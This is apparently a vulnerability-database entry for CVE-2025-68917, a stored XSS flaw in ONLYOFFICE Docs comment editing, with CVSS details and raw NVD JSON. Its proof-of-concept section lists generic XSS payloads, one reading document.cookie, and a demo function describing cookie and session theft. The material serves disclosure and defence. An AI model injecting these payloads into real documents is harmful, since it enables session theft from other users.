Security Vulnerability Report
CVE-2025-68917 CVSS 6.4 MEDIUM

CVE-2025-68917

Published: 2025-12-24 21:16:04
Last Modified: 2026-04-15 00:35:42

Description

ONLYOFFICE Docs before 9.2.1 allows XSS in the textarea of the comment editing form. This is related to DocumentServer.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ONLYOFFICE Docs DocumentServer < 9.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-68917 XSS PoC for ONLYOFFICE Docs Comment Editing Form
// This PoC demonstrates the stored XSS vulnerability in the comment textarea

// Method 1: Basic script tag injection
const xssPayload1 = '<script>alert(document.domain)</script>';

// Method 2: Event handler injection (img onerror)
const xssPayload2 = '<img src=x onerror=alert(document.cookie)>';

// Method 3: Event handler injection (body onload)
const xssPayload3 = '<body onload=alert("XSS")>';

// Method 4: SVG injection
const xssPayload4 = '<svg onload=alert(document.location)>';

// Function to demonstrate the attack flow
function exploitXSS() {
  // Step 1: Attacker injects malicious comment
  const maliciousComment = {
    action: 'submitComment',
    documentId: 'target_document_id',
    commentText: xssPayload2,
    userId: 'attacker_user_id'
  };

  console.log('[+] Attacker injects XSS payload into comment field');
  console.log('[+] Payload:', maliciousComment.commentText);

  // Step 2: Payload is stored without proper sanitization
  // In vulnerable version < 9.2.1, the payload is saved as-is

  // Step 3: Victim views the document with the malicious comment
  console.log('[+] Victim opens the document');
  console.log('[+] XSS payload executes in victim\'s browser context');
  console.log('[+] Attacker can steal cookies, session tokens, etc.');

  return maliciousComment;
}

// Execute exploit demonstration
exploitXSS();

References

https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68917", "sourceIdentifier": "[email protected]", "published": "2025-12-24T21:16:04.153", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ONLYOFFICE Docs before 9.2.1 allows XSS in the textarea of the comment editing form. This is related to DocumentServer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921", "source": "[email protected]"}]}}